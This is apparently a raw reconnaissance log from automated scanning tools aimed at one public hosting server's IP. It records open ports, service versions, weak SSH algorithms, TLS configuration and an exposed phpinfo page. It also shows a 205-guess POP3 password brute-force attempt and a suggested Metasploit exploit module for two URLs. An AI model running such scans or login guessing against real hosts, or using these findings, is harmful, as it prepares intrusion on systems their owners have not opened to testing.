- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:50 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- Not shown: 459 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.20s latency).
- Not shown: 11 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- Nmap done: 1 IP address (1 host up) scanned in 23.12 seconds
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: Linux 2.4.X|2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
- OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
- Network Distance: 12 hops
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 102.94 ms 10.251.200.1
- 2 103.36 ms 185.94.189.129
- 3 104.94 ms 185.206.226.109
- 4 105.12 ms 213.248.70.225
- 5 218.06 ms prs-bb4-link.telia.net (62.115.138.138)
- 6 222.38 ms 80.91.251.243
- 7 204.20 ms atl-b22-link.telia.net (62.115.125.191)
- 8 217.44 ms 80.91.246.75
- 9 222.00 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 217.75 ms 207.210.229.6
- 11 219.03 ms 174.136.31.214
- 12 ... 30
- ######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- # message authentication code algorithms
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:02 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 22/tcp closed ssh
- Too many fingerprints match this host to give specific OS details
- Network Distance: 12 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 103.33 ms 10.251.200.1
- 2 110.54 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 103.47 ms 185.206.226.109
- 4 103.50 ms 213.248.70.225
- 5 219.92 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 220.92 ms 80.91.251.243
- 7 203.39 ms atl-b22-link.telia.net (62.115.125.191)
- 8 219.92 ms 80.91.246.75
- 9 220.49 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 220.48 ms 207.210.229.6
- 11 219.97 ms 174.136.31.218
- 12 220.15 ms 173.237.136.21
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:03 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.22s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain?
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- |_dns-nsec-enum: Can't determine domain for host 173.237.136.21; use dns-nsec-enum.domains script arg.
- |_dns-nsec3-enum: Can't determine domain for host 173.237.136.21; use dns-nsec3-enum.domains script arg.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 4.4 (93%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.2 - 4.9 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 12 hops
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ list.quorum.to - FAIL
- |_dns-brute: Can't guess domain of "173.237.136.21"; use dns-brute.domain script argument.
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 103.29 ms 10.251.200.1
- 2 103.35 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 105.73 ms 185.206.226.109
- 4 105.76 ms 213.248.70.225
- 5 222.25 ms prs-bb3-link.telia.net (62.115.138.132)
- 6 223.23 ms 80.91.251.243
- 7 201.37 ms atl-b22-link.telia.net (62.115.125.128)
- 8 222.03 ms 80.91.246.75
- 9 218.83 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
- 10 218.58 ms 207.210.229.6
- 11 218.27 ms 174.136.31.218
- 12 218.56 ms 173.237.136.21
- #######################################################################################################################################
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://173.237.136.21
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- http://173.237.136.21 [200 OK] Country[UNITED STATES][US], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel
- http://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, IP[173.237.136.21], Title[Default Web Site Page]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://173.237.136.21...
- ___________________ SITE INFO ___________________
- IP Title
- 173.237.136.21
- ____________________ VERSION ____________________
- Name Versions Type
- PHP 5.6.35 Platform
- __________________ INTERESTING __________________
- URL Note Type
- /phpinfo.php PHP info file Interesting
- _________________________________________________
- Time: 1.1 sec Urls: 598 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Date: Fri, 23 Nov 2018 05:05:29 GMT
- Content-Type: text/html
- Last-Modified: Thu, 20 Oct 2016 16:22:47 GMT
- Content-Encoding: gzip
- Connection: keep-alive
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:05 EST
- Nmap scan report for 173.237.136.21
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 205 guesses in 181 seconds, average tps: 1.0
- |_pop3-capabilities: USER PIPELINING UIDL CAPA STLS AUTH-RESP-CODE TOP RESP-CODES SASL(PLAIN LOGIN)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 1 hop
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 106.31 ms 173.237.136.21
- #######################################################################################################################################
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://173.237.136.21
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- https://173.237.136.21 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
- https://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginHSTS
- PluginOpenSSLCipherSuites
- PluginSessionResumption
- PluginSessionRenegotiation
- PluginChromeSha1Deprecation
- PluginCertInfo
- PluginHeartbleed
- PluginCompression
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 173.237.136.21:443 => 173.237.136.21:443
- SCAN RESULTS FOR 173.237.136.21:443 - 173.237.136.21:443
- --------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
- Common Name: *.myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
- Not Before: Jun 8 00:00:00 2018 GMT
- Not After: Jun 8 23:59:59 2020 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- SCAN COMPLETED IN 51.14 S
- -------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server 173.237.136.21 on port 443 using SNI name 173.237.136.21
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.myserverhosts.com
- Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Not valid before: Jun 8 00:00:00 2018 GMT
- Not valid after: Jun 8 23:59:59 2020 GMT
- + -- --=[Port 8080 opened... running tests...
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://173.237.136.21:8080
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://173.237.136.21:8080 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
- http://173.237.136.21:8080/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server 173.237.136.21 on port 8080 using SNI name 173.237.136.21
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://173.237.136.21:8080 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 opened... running tests...
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://173.237.136.21:8443
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- http://173.237.136.21:8443 [400 Bad Request] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[400 The plain HTTP request was sent to HTTPS port], nginx[1.14.0]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 173.237.136.21
- Testing SSL server 173.237.136.21 on port 8443 using SNI name 173.237.136.21
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.myserverhosts.com
- Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Not valid before: Jun 8 00:00:00 2018 GMT
- Not valid after: Jun 8 23:59:59 2020 GMT
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginChromeSha1Deprecation
- PluginHeartbleed
- PluginSessionRenegotiation
- PluginCompression
- PluginCertInfo
- PluginHSTS
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 173.237.136.21:8443 => 173.237.136.21:8443
- SCAN RESULTS FOR 173.237.136.21:8443 - 173.237.136.21:8443
- ----------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
- Common Name: *.myserverhosts.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
- Not Before: Jun 8 00:00:00 2018 GMT
- Not After: Jun 8 23:59:59 2020 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
- SRP-3DES-EDE-CBC-SHA timeout - timed out
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC3-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC3-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDH-RSA-NULL-SHA timeout - timed out
- ECDH-RSA-DES-CBC3-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC3-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: https://173.237.136.21:8443 **
- [*] Checking admin-console: [ OK ]
- [*] Checking Struts2: [ OK ]
- [*] Checking Servlet Deserialization: [ OK ]
- [*] Checking Application Deserialization: [ OK ]
- [*] Checking Jenkins: [ OK ]
- [*] Checking web-console: [ OK ]
- [*] Checking jmx-console: [ OK ]
- [*] Checking JMXInvokerServlet: [ OK ]
- * Results:
- The server is not vulnerable to bugs tested ... :D
- #######################################################################################################################################
- I, [2018-11-23T00:16:41.569567 #12203] INFO -- : Initiating port scan
- I, [2018-11-23T00:17:42.345289 #12203] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-16-41.xml
- I, [2018-11-23T00:17:42.346515 #12203] INFO -- : Discovered open port: 173.237.136.21:80
- I, [2018-11-23T00:17:43.324894 #12203] INFO -- : Discovered open port: 173.237.136.21:443
- I, [2018-11-23T00:17:45.121214 #12203] INFO -- : Discovered open port: 173.237.136.21:465
- I, [2018-11-23T00:17:46.524137 #12203] INFO -- : Discovered open port: 173.237.136.21:993
- I, [2018-11-23T00:17:48.741643 #12203] INFO -- : Discovered open port: 173.237.136.21:995
- I, [2018-11-23T00:17:50.962609 #12203] INFO -- : Discovered open port: 173.237.136.21:8443
- I, [2018-11-23T00:17:52.776201 #12203] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
- +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:21 EST
- NSE: Loaded 148 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 00:22
- Completed NSE at 00:22, 0.00s elapsed
- Initiating NSE at 00:22
- Completed NSE at 00:22, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 00:22
- Completed Parallel DNS resolution of 1 host. at 00:22, 16.51s elapsed
- Initiating SYN Stealth Scan at 00:22
- Scanning 173.237.136.21 [474 ports]
- Discovered open port 80/tcp on 173.237.136.21
- Discovered open port 993/tcp on 173.237.136.21
- Discovered open port 3306/tcp on 173.237.136.21
- Discovered open port 53/tcp on 173.237.136.21
- Discovered open port 22/tcp on 173.237.136.21
- Discovered open port 143/tcp on 173.237.136.21
- Discovered open port 587/tcp on 173.237.136.21
- Discovered open port 995/tcp on 173.237.136.21
- Discovered open port 110/tcp on 173.237.136.21
- Discovered open port 21/tcp on 173.237.136.21
- Discovered open port 443/tcp on 173.237.136.21
- Discovered open port 8080/tcp on 173.237.136.21
- Discovered open port 465/tcp on 173.237.136.21
- Discovered open port 8443/tcp on 173.237.136.21
- Completed SYN Stealth Scan at 00:22, 4.55s elapsed (474 total ports)
- Initiating Service scan at 00:22
- Scanning 14 services on 173.237.136.21
- Completed Service scan at 00:22, 33.92s elapsed (14 services on 1 host)
- Initiating OS detection (try #1) against 173.237.136.21
- Retrying OS detection (try #2) against 173.237.136.21
- WARNING: OS didn't match until try #2
- Initiating Traceroute at 00:23
- Completed Traceroute at 00:23, 0.22s elapsed
- Initiating Parallel DNS resolution of 2 hosts. at 00:23
- Completed Parallel DNS resolution of 2 hosts. at 00:23, 16.50s elapsed
- NSE: Script scanning 173.237.136.21.
- Initiating NSE at 00:23
- Completed NSE at 00:25, 140.31s elapsed
- Initiating NSE at 00:25
- Completed NSE at 00:25, 0.46s elapsed
- Nmap scan report for 173.237.136.21
- Host is up (0.13s latency).
- Not shown: 457 closed ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp Pure-FTPd
- | ssl-cert: Subject: commonName=uscentral22.myserverhosts.com
- | Subject Alternative Name: DNS:uscentral22.myserverhosts.com, DNS:www.uscentral22.myserverhosts.com
- | Issuer: commonName=cPanel, Inc. Certification Authority/organizationName=cPanel, Inc./stateOrProvinceName=TX/countryName=US
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2018-05-03T00:00:00
- | Not valid after: 2019-05-03T23:59:59
- | MD5: 9f53 7598 7aaa 4c71 27d6 9681 bf06 a492
- |_SHA-1: 6541 4f83 18e9 cf69 13af ee68 e216 d3ae 10c8 0254
- |_ssl-date: 2018-11-23T05:23:22+00:00; 0s from scanner time.
